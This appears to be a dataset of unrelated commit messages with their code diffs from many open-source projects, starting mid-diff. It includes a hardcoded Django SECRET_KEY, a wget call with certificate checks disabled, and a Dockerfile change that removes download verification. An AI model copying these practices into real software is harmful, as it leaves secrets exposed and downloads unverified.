time.sleep(1) - - for thread in threads: - thread.join() + thread_protected_server.join() + thread_unprotected_server.join()
Update main.yml Use a admin user's token instead of github generated token as the latter one doesn't have permission to merge to protected branch
@@ -49,14 +49,14 @@ jobs: id: metadata uses: dependabot/[email protected] with: - github-token: "${{ secrets.GITHUB_TOKEN }}" + github-token: "${{ secrets.BEANRUNNER_BOT_TOKEN }}" - name: Approve a PR run: gh pr review --approve "$PR_URL" env: PR_URL: ${{github.event.pull_request.html_url}} - GITHUB_TOKEN: ${{secrets.GITHUB_TOKEN}} + GITHUB_TOKEN: ${{secrets.BEANRUNNER_BOT_TOKEN}} - name: Enable auto-merge for Dependabot PRs run: gh pr merge --auto --merge "$PR_URL" env: PR_URL: ${{github.event.pull_request.html_url}} - GITHUB_TOKEN: ${{secrets.GITHUB_TOKEN}} + GITHUB_TOKEN: ${{secrets.BEANRUNNER_BOT_TOKEN}}
Oops, attributed a contribution to the wrong person! Eryk Sun provided the stanza used to check for attribution.
@@ -259,7 +259,7 @@ if args.output: # --- define helpers ---- if sys.platform == 'win32': - # thanks to Brett Cannon for this recipe + # thanks to Eryk Sun for this recipe import ctypes shlwapi = ctypes.OleDLL('shlwapi')
Send signals a little more gracefully If there are failures, still send the signal so handlers can add additional errors
@@ -349,7 +349,7 @@ class LocationFormSet(object): ) if self.include_user_forms: clean_commcare_user.send( - 'MobileWorkerListView.create_mobile_worker', + 'LocationFormSet', domain=self.domain, request_user=self.request_user, user=self.user, @@ -377,11 +377,12 @@ class LocationFormSet(object): @property @memoized def user(self): - user_data = self.custom_user_data.get_data_to_save() - username = self.user_form.cleaned_data['username'] - password = self.user_form.cleaned_data['password'] - first_name = self.user_form.cleaned_data['first_name'] - last_name = self.user_form.cleaned_data['last_name'] + user_data = (self.custom_user_data.get_data_to_save() + if self.custom_user_data.is_valid() else {}) + username = self.user_form.cleaned_data.get('username', "") + password = self.user_form.cleaned_data.get('password', "") + first_name = self.user_form.cleaned_data.get('first_name', "") + last_name = self.user_form.cleaned_data.get('last_name', "") return CommCareUser.create( self.domain,
use `cmake` from `anaconda` for multi-architecture support images building successfully for `amd64/arm64/ppc64le`
# Use conda to resolve dependencies cross-platform FROM continuumio/miniconda3:4.11.0 as builder -ARG TARGETPLATFORM # install libpng to system for cross-architecture support # https://github.com/ANTsX/ANTs/issues/1069#issuecomment-681131938 -# Also install kitware key and get recent cmake RUN apt-get update && \ apt-get install -y --no-install-recommends \ apt-transport-https \ @@ -19,22 +17,9 @@ RUN apt-get update && \ libpng-dev \ software-properties-common -# Install cmake from binary +# install cmake binary using conda for multi-arch support # apt install fails because libssl1.0.0 is not available for newer Debian -# Download verification stuff from https://cmake.org/install/ -ARG CMAKE_VERSION=3.23.1 -RUN if [ "$TARGETPLATFORM" = "linux/amd64" ]; then ARCHITECTURE=x86_64; elif [ "$TARGETPLATFORM" = "linux/arm/v7" ]; then ARCHITECTURE=arm; elif [ "$TARGETPLATFORM" = "linux/arm64" ]; then ARCHITECTURE=aarch64; elif [ "$TARGETPLATFORM" = "linux/ppc64le" ]; then ARCHITECTURE=x86_64; else ARCHITECTURE=x86_64; fi && \ - curl -OL https://github.com/Kitware/CMake/releases/download/v${CMAKE_VERSION}/cmake-${CMAKE_VERSION}-SHA-256.txt && \ - curl -OL https://github.com/Kitware/CMake/releases/download/v${CMAKE_VERSION}/cmake-${CMAKE_VERSION}-linux-${ARCHITECTURE}.sh && \ - sha256sum -c --ignore-missing cmake-${CMAKE_VERSION}-SHA-256.txt && \ - curl -OL https://github.com/Kitware/CMake/releases/download/v${CMAKE_VERSION}/cmake-${CMAKE_VERSION}-SHA-256.txt.asc && \ - gpg --keyserver hkps://keyserver.ubuntu.com --recv-keys C6C265324BBEBDC350B513D02D2CEF1034921684 && \ - gpg --verify cmake-${CMAKE_VERSION}-SHA-256.txt.asc cmake-${CMAKE_VERSION}-SHA-256.txt && \ - mkdir /opt/cmake && \ - chmod +x cmake-${CMAKE_VERSION}-linux-${ARCHITECTURE}.sh && \ - ./cmake-${CMAKE_VERSION}-linux-${ARCHITECTURE}.sh --skip-license --prefix=/opt/cmake - -ENV PATH=/opt/cmake/bin:${PATH} +RUN conda install -c anaconda cmake WORKDIR /usr/local/src COPY environment.yml .
Adds a "full" default gauge group to GateSets loaded from text files. This avoids the issue of having to set the gauge group manually, and seems completely justified since stdinput.py's read_gateset only constructs FullyParameterizedGate objects (parameterizations are not conveyed in the text format of a GateSet).
@@ -885,4 +885,8 @@ def read_gateset(filename): if len(remainder_spam_label) > 0: gs.spamdefs[remainder_spam_label] = ('remainder', 'remainder') + #Add default gauge group -- the full group because + # we add FullyParameterizedGates above. + gs.default_gauge_group = _objs.FullGaugeGroup(gs.dim) + return gs
Update auto_threshold_methods.py update debug method
@@ -8,6 +8,7 @@ from plantcv.plantcv.transform import resize_factor from plantcv.plantcv import plot_image from plantcv.plantcv import print_image from plantcv.plantcv import fatal_error +from plantcv.plantcv._debug import _debug from plantcv.plantcv.threshold import mean from plantcv.plantcv.threshold import otsu from plantcv.plantcv.threshold import gaussian @@ -64,13 +65,8 @@ def auto_threshold_methods(gray_img, grid_img=True, object_type="light"): fontScale=params.text_size, color=(255, 0, 255), thickness=params.text_thickness) # Reset debug mode params.debug = debug - if params.debug == "print": - # If debug is print, save the image to a file - print_image(labeled, os.path.join(params.debug_outdir, str(params.device) + "_" + + _debug(visual=labeled, filename=os.path.join(params.debug_outdir, str(params.device) + "_" + method_names[i] + "_vis_thresholds.png")) - elif params.debug == "plot": - # If debug is plot, print to the plotting device - plot_image(labeled) labeled_imgs.append(labeled) if grid_img: @@ -85,11 +81,7 @@ def auto_threshold_methods(gray_img, grid_img=True, object_type="light"): plotting_img = resize_factor(plotting_img, factors=(0.5, 0.5)) # Reset debug mode params.debug = debug - if params.debug == "print": - # If debug is print, save the image to a file - print_image(plotting_img, os.path.join(params.debug_outdir, str(params.device) + "_vis_all_thresholds.png")) - elif params.debug == "plot": - # If debug is plot, print to the plotting device - plot_image(plotting_img) + _debug(visual=plotting_img, filename=os.path.join(params.debug_outdir, str(params.device) + + "_vis_all_thresholds.png")) return labeled_imgs
Adding reminder to remove pre-generated SECRET_KEY Later on, we'll need environment-based default configs anyway, so this will probably be done together.
@@ -20,6 +20,7 @@ BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! +# TODO: remove this SECRET_KEY = 'oc2z%5)lu#jsxi#wpg)700z@v48)2aa_yn(a(3qg!z!fw&tr9f' # SECURITY WARNING: don't run with debug turned on in production!
Pass env rebindings to lexical env get in properties TN:
@@ -11,8 +11,8 @@ from langkit.compiled_types import ( from langkit.diagnostics import check_source_language from langkit.expressions.base import ( AbstractVariable, AbstractExpression, ArrayExpr, BasicExpr, - BuiltinCallExpr, GetSymbol, PropertyDef, ResolvedExpression, Self, - auto_attr, auto_attr_custom, construct + BuiltinCallExpr, FieldAccessExpr, GetSymbol, PropertyDef, + ResolvedExpression, Self, auto_attr, auto_attr_custom, construct ) @@ -138,7 +138,12 @@ def env_get(self, env_expr, symbol_expr, resolve_unique=False, args = [('Self', construct(env_expr, LexicalEnvType)), ('Key', sym_expr), - ('Recursive', construct(recursive, BoolType))] + ('Recursive', construct(recursive, BoolType)), + ('Rebindings', FieldAccessExpr( + construct(current_prop.entity_info_arg.var), + 'Rebindings', + EnvRebindingsType + ))] # Pass the From parameter if the user wants sequential semantics if sequential:
Improvements for RPC to the gateway. Added functions: gateway_devices - returns object with keys - device names and values - connector names gateway_stats - returns information about count of the processed messages of 5 last seconds
@@ -76,6 +76,8 @@ class TBGatewayService: } self.__gateway_rpc_methods = { "ping": self.__rpc_ping, + "stats": self.__form_statistics, + "devices": self.__rpc_devices, } self.__sheduled_rpc_calls = [] self.__self_rpc_sheduled_methods_functions = { @@ -108,17 +110,16 @@ class TBGatewayService: cur_time = time.time()*1000 if self.__sheduled_rpc_calls: for rpc_call_index in range(len(self.__sheduled_rpc_calls)): + rpc_call = self.__sheduled_rpc_calls[rpc_call_index] + if cur_time > rpc_call[0]: rpc_call = self.__sheduled_rpc_calls.pop(rpc_call_index) - if rpc_call != 'del' and cur_time > rpc_call[0]: result = None try: result = rpc_call[1]["function"](*rpc_call[1]["arguments"]) except Exception as e: log.exception(e) - log.info(result) - else: - del rpc_call - rpc_call = "del" + if result == 256: + log.warning("Error on RPC command: 256. Permission denied.") if self.__rpc_requests_in_progress and self.tb_client.is_connected(): for rpc_in_progress, data in self.__rpc_requests_in_progress.items(): if cur_time >= data[1]: @@ -446,6 +447,13 @@ class TBGatewayService: def __rpc_ping(self, *args): return {"code": 200, "resp": "pong"} + def __rpc_devices(self, *args): + data_to_send = {} + for device in self.__connected_devices: + if self.__connected_devices[device]["connector"] is not None: + data_to_send[device] = self.__connected_devices[device]["connector"].get_name() + return {"code": 200, "resp": data_to_send} + def rpc_with_reply_processing(self, topic, content): req_id = self.__rpc_requests_in_progress[topic][0]["data"]["id"] device = self.__rpc_requests_in_progress[topic][0]["device"]
comment out I comment out some code lines in the test-section
@@ -184,26 +184,26 @@ class XORCipher(object): # Tests -crypt = XORCipher() -key = 67 +# crypt = XORCipher() +# key = 67 -# test enrcypt -print crypt.encrypt("hallo welt",key) -# test decrypt -print crypt.decrypt(crypt.encrypt("hallo welt",key), key) +# # test enrcypt +# print crypt.encrypt("hallo welt",key) +# # test decrypt +# print crypt.decrypt(crypt.encrypt("hallo welt",key), key) -# test encrypt_string -print crypt.encrypt_string("hallo welt",key) +# # test encrypt_string +# print crypt.encrypt_string("hallo welt",key) -# test decrypt_string -print crypt.decrypt_string(crypt.encrypt_string("hallo welt",key),key) +# # test decrypt_string +# print crypt.decrypt_string(crypt.encrypt_string("hallo welt",key),key) -if (crypt.encrypt_file("test.txt",key)): - print "encrypt successful" -else: - print "encrypt unsuccessful" +# if (crypt.encrypt_file("test.txt",key)): +# print "encrypt successful" +# else: +# print "encrypt unsuccessful" -if (crypt.decrypt_file("encrypt.out",key)): - print "decrypt successful" -else: - print "decrypt unsuccessful" \ No newline at end of file +# if (crypt.decrypt_file("encrypt.out",key)): +# print "decrypt successful" +# else: +# print "decrypt unsuccessful" \ No newline at end of file
Optimize check_migrated in cinder_helper.py There are more than one 'migrating' status in the volume migration. Others include starting, completing and so on. So we should check the final status 'success' and 'error'.
@@ -165,7 +165,8 @@ class CinderHelper(object): def check_migrated(self, volume, retry_interval=10): volume = self.get_volume(volume) - while getattr(volume, 'migration_status') == 'migrating': + final_status = ('success', 'error') + while getattr(volume, 'migration_status') not in final_status: volume = self.get_volume(volume.id) LOG.debug('Waiting the migration of {0}'.format(volume)) time.sleep(retry_interval)
Fix print statement in READ.md print statement was throwing generator object instead of printing names of available datasets/metrics
@@ -81,14 +81,14 @@ Here is a quick example: import nlp # Print all the available datasets -print(dataset.id for dataset in nlp.list_datasets()) +print([dataset.id for dataset in nlp.list_datasets()]) # Load a dataset and print the first examples in the training set squad_dataset = nlp.load_dataset('squad') print(squad_dataset['train'][0]) # List all the available metrics -print(metric.id for metric in nlp.list_metrics()) +print([metric.id for metric in nlp.list_metrics()]) # Load a metric squad_metric = nlp.load_metric('squad')
update validator to rely on sheet title for identifying if its a single sheet or multi sheet
@@ -45,30 +45,31 @@ class UploadedTranslationsValidator(object): self.current_rows = dict() # module_or_form_id: translations self.lang_prefix = lang_prefix self.default_language_column = self.lang_prefix + self.app.default_language - self.lang_to_compare = lang_to_compare + self.lang_to_compare = lang_to_compare or self.app.default_language self.single_sheet = False self._setup() def _setup(self): - if self.lang_to_compare: + if self._is_single_sheet(): # assume its a single sheet workbook if there is a language self.single_sheet = True - self._ensure_single_sheet() - target_lang = self.lang_to_compare self.lang_cols_to_compare = [self.lang_prefix + self.lang_to_compare] else: - target_lang = self.app.default_language self.lang_cols_to_compare = [self.lang_prefix + self.app.default_language] + if self.lang_to_compare != self.app.default_language: + self.lang_cols_to_compare.append(self.lang_prefix + self.lang_to_compare) self.app_translation_generator = AppTranslationsGenerator( - self.app.domain, self.app.get_id, None, self.app.default_language, target_lang, + self.app.domain, self.app.get_id, None, self.app.default_language, self.lang_to_compare, self.lang_prefix) self.current_sheet_name_to_module_or_form_type_and_id = dict() self.uploaded_sheet_name_to_module_or_form_type_and_id = dict() - def _ensure_single_sheet(self): - sheet = self.uploaded_workbook.worksheets[0] - if not is_single_sheet(sheet.title): - raise Exception("Expected single sheet with title %s" % SINGLE_SHEET_NAME) + def _is_single_sheet(self): + sheets_count = len(self.uploaded_workbook.worksheets) + first_sheet = self.uploaded_workbook.worksheets[0] + if sheets_count == 1 and is_single_sheet(first_sheet.title): + return True + return False def _generate_current_headers_and_rows(self): self.current_headers = { @@ -78,6 +79,7 @@ class UploadedTranslationsValidator(object): self.app, lang=self.lang_to_compare, eligible_for_transifex_only=True, + single_sheet=self.single_sheet, )} if self.single_sheet: self.current_rows = get_bulk_app_single_sheet_by_name(
Avoid parent process connection cleanup in the test suite. Fix
@@ -41,8 +41,29 @@ class ProcessSetup(multiprocessing.Process): else: django.setup() + def cleanup_connections(self): + + # Channels run `django.db.close_old_connections` as a signal + # receiver after each consumer finished event. This function + # iterate on each created connection wrapper, checks if + # connection is still usable and closes it otherwise. Under + # normal circumstances this is a very reasonable approach. + # When process starts the usual way `django.db.connections` + # contains empty connection list. But channels worker in the + # test case is created with the fork system call. This means + # file descriptors from the parent process are available in + # the connection list, but connections themselves are not + # usable. So test worker will close connections of the parent + # process and test suite will fail when it tries to flush + # database after test run. + # + # See https://github.com/django/channels/issues/614 + for alias in self.databases: + del connections[alias] + def setup_databases(self): + self.cleanup_connections() for alias, db in self.databases.items(): backend = load_backend(db['ENGINE']) conn = backend.DatabaseWrapper(db, alias)
Made gnomad gnome download restartable Made gnomad gnome download restartable
@@ -33,6 +33,7 @@ recipe: gnomad_fields_to_keep_url=https://gist.githubusercontent.com/naumenko-sa/d20db928b915a87bba4012ba1b89d924/raw/cf343b105cb3347e966cc95d049e364528c86880/gnomad_fields_to_keep.txt wget --no-check-certificate -c $gnomad_fields_to_keep_url + wget -c ${url_prefix}CHECKSUMS # no chrY in gnomad genome in hg38 for chrom in $(seq 1 22;echo X) @@ -41,9 +42,44 @@ recipe: then vcf=${vcf_prefix}${chrom}_noVEP.vcf.gz vcf_url=${url_prefix}${vcf} + vcf_local=`basename $vcf_url` + get_vcf=0 + + while [ $get_vcf -lt 2 ] + do + let get_vcf=$get_vcf+1 + wget -c $vcf_url wget -c $vcf_url.tbi + sum_obs=`sum $vcf_local` + sum_exp=`grep $vcf_local CHECKSUMS | awk '{print $1,$2}'` + + sum_obs_index=`sum $vcf_local.tbi` + sum_exp_index=`grep $vcf_local.tbi CHECKSUMS | awk '{print $1,$2}'` + + if [[ $sum_obs != $sum_exp ]] + then + rm $vcf_local + fi + + if [[ $sum_obs_index != $sum_exp_index ]] + then + rm $vcf_local.tbi + fi + + if [[ $sum_obs == $sum_exp ]] & [[ $sum_obs_index == $sum_exp_index ]] + then + get_vcf=100 + fi + done + + if [ $get_vcf -ne 100 ] + then + echo "Failed to download `basename $vcf_url`" + exit + fi + fields_to_keep="INFO/"$(cat gnomad_fields_to_keep.txt | paste -s | sed s/"\t"/",INFO\/"/g) # bcftools annotate is picky about vcf header and brakes if moved down the pipe after remap gunzip -c $vcf | bcftools view -f PASS -Ov | bcftools annotate -x "^$fields_to_keep" -Ov | sed -f remap.sed | grep -v "##contig=" | gsort -m 3000 /dev/stdin $ref.fai | vt normalize -r $ref -n - | vt uniq - | bgzip -c > variation/gnomad_genome.chr${chrom}.vcf.gz
docs(database): change gino homepage url Change homepage url gino from `https://python-gino.readthedocs.io/en/latest/` to `https://python-gino.org/`
Starlette is not strictly tied to any particular database implementation. -You can use it with an asynchronous ORM, such as [GINO](https://python-gino.readthedocs.io/en/latest/), +You can use it with an asynchronous ORM, such as [GINO](https://python-gino.org/), or use regular non-async endpoints, and integrate with [SQLAlchemy](https://www.sqlalchemy.org/). In this documentation we'll demonstrate how to integrate against [the `databases` package](https://github.com/encode/databases),
Fix `check_json` The payload is sometimes a list
@@ -193,7 +193,7 @@ def generateOfflineThreadingID(): def check_json(j): - if j.get("payload") and j["payload"].get("error"): + if hasattr(j.get("payload"), "get") and j["payload"].get("error"): raise FBchatFacebookError( "Error when sending request: {}".format(j["payload"]["error"]), fb_error_code=None,
Update data_utils.py Switch the order of if-elif blocks in `get_tokenizer`
@@ -29,13 +29,13 @@ def natural_sort(l): def get_tokenizer(tokenizer_type=None, from_pretrained=True, add_padding_token=False): - if (tokenizer_type.lower() == "hf_gpt2tokenizerfast" and from_pretrained) or tokenizer_type is None: - tok = GPT2TokenizerFast.from_pretrained('gpt2') + if tokenizer_type.lower() == "hf_gp2tokenizer" and from_pretrained: + tok = GPT2Tokenizer.from_pretrained('gpt2') if add_padding_token: tok.add_special_tokens({'pad_token': '<|padding|>'}) return tok - elif tokenizer_type.lower() == "hf_gp2tokenizer" and from_pretrained: - tok = GPT2Tokenizer.from_pretrained('gpt2') + elif (tokenizer_type.lower() == "hf_gpt2tokenizerfast" and from_pretrained) or tokenizer_type is None: + tok = GPT2TokenizerFast.from_pretrained('gpt2') if add_padding_token: tok.add_special_tokens({'pad_token': '<|padding|>'}) return tok
RAMECC: Keep separate defintions for RAMECC3 RAMECC3 only has two monitoring units
@@ -194,5 +194,93 @@ _add: derivedFrom: RAMECC1 baseAddress: 0x48023000 RAMECC3: - derivedFrom: RAMECC1 + description: RAM ECC monitoring + groupName: RAMECC baseAddress: 0x58027000 + registers: + IER: + description: RAMECC interrupt enable register + addressOffset: 0x0 + access: read-write + resetValue: 0x00000000 + fields: + GECCDEBWIE: + description: Global ECC double error on byte write interrupt enable + bitOffset: 3 + bitWidth: 1 + access: read-write + GECCDEIE: + description: Global ECC double error interrupt enable + bitOffset: 2 + bitWidth: 1 + access: read-write + GECCSEIE: + description: Global ECC single error interrupt enable + bitOffset: 1 + bitWidth: 1 + access: read-write + GIE: + description: Global interrupt enable + bitOffset: 0 + bitWidth: 1 + access: read-write + M1CR: + description: RAMECC monitor 1 configuration register + addressOffset: 0x20 + access: read-write + resetValue: 0x00000000 + M1SR: + description: RAMECC monitor 1 status register + addressOffset: 0x24 + access: read-write + resetValue: 0x00000000 + M1FAR: + description: RAMECC monitor 1 failing address register + addressOffset: 0x28 + access: read-write + resetValue: 0x00000000 + M1FDRL: + description: RAMECC monitor 1 failing data low register + addressOffset: 0x2C + access: read-write + resetValue: 0x00000000 + M1FDRH: + description: RAMECC monitor 1 failing data high register + addressOffset: 0x30 + access: read-write + resetValue: 0x00000000 + M1FECR: + description: RAMECC monitor 1 failing error code register + addressOffset: 0x34 + access: read-write + resetValue: 0x00000000 + M2CR: + description: RAMECC monitor 2 configuration register + addressOffset: 0x40 + access: read-write + resetValue: 0x00000000 + M2SR: + description: RAMECC monitor 2 status register + addressOffset: 0x44 + access: read-write + resetValue: 0x00000000 + M2FAR: + description: RAMECC monitor 2 failing address register + addressOffset: 0x48 + access: read-write + resetValue: 0x00000000 + M2FDRL: + description: RAMECC monitor 2 failing data low register + addressOffset: 0x4C + access: read-write + resetValue: 0x00000000 + M2FDRH: + description: RAMECC monitor 2 failing data high register + addressOffset: 0x50 + access: read-write + resetValue: 0x00000000 + M2FECR: + description: RAMECC monitor 2 failing error code register + addressOffset: 0x54 + access: read-write + resetValue: 0x00000000
Update mkvtomp4.py abort if no audio tracks
@@ -747,6 +747,10 @@ class MkvtoMp4: self.log.debug("Output directory: %s." % output_dir) self.log.debug("Output file: %s." % outputfile) + if len(options['audio']) == 0: + self.error.info("Conversion has no audio tracks, aborting") + return inputfile, "" + if self.output_extension == input_extension and len([x for x in [options['video']] + [x for x in options['audio'].values()] + [x for x in options['subtitle'].values()] if x['codec'] != 'copy']) == 0: self.log.info("Input and output extensions match and every codec is copy, this file probably doesn't need conversion, returning.") self.log.info(inputfile)
Catch 404 in wait_for_deletion when reacting The message may be deleted before the bot gets a chance to react. Fixes
@@ -34,7 +34,11 @@ async def wait_for_deletion( if attach_emojis: for emoji in deletion_emojis: + try: await message.add_reaction(emoji) + except discord.NotFound: + log.trace(f"Aborting wait_for_deletion: message {message.id} deleted prematurely.") + return def check(reaction: discord.Reaction, user: discord.Member) -> bool: """Check that the deletion emoji is reacted by the appropriate user."""
cwltool: pass tmpdir as tmpdir down to workwlows instead of outdir as before. This solves the issue of out_tmpdir* and tmp* directories appearing in the designated output directory after the run.
@@ -953,6 +953,7 @@ def main(args=None, stdout=sys.stdout): if args is None: args = sys.argv[1:] + #we use workdir as jobStore: options = parser.parse_args([workdir] + args) use_container = not options.no_container @@ -961,6 +962,9 @@ def main(args=None, stdout=sys.stdout): cwllogger.setLevel(options.logLevel) outdir = os.path.abspath(options.outdir) + tmp_outdir_prefix = os.path.abspath(options.tmp_outdir_prefix) + tmpdir_prefix = os.path.abspath(options.tmpdir_prefix) + fileindex = {} existing = {} make_tool_kwargs = {} @@ -1049,7 +1053,8 @@ def main(args=None, stdout=sys.stdout): make_opts = copy.deepcopy(vars(options)) make_opts.update({'tool': t, 'jobobj': {}, 'use_container': use_container, - 'tmpdir': os.path.realpath(outdir), + 'tmpdir': os.path.realpath(tmpdir_prefix), + 'tmp_outdir_prefix' : os.path.realpath(tmp_outdir_prefix), 'job_script_provider': job_script_provider}) (wf1, wf2) = makeJob(**make_opts)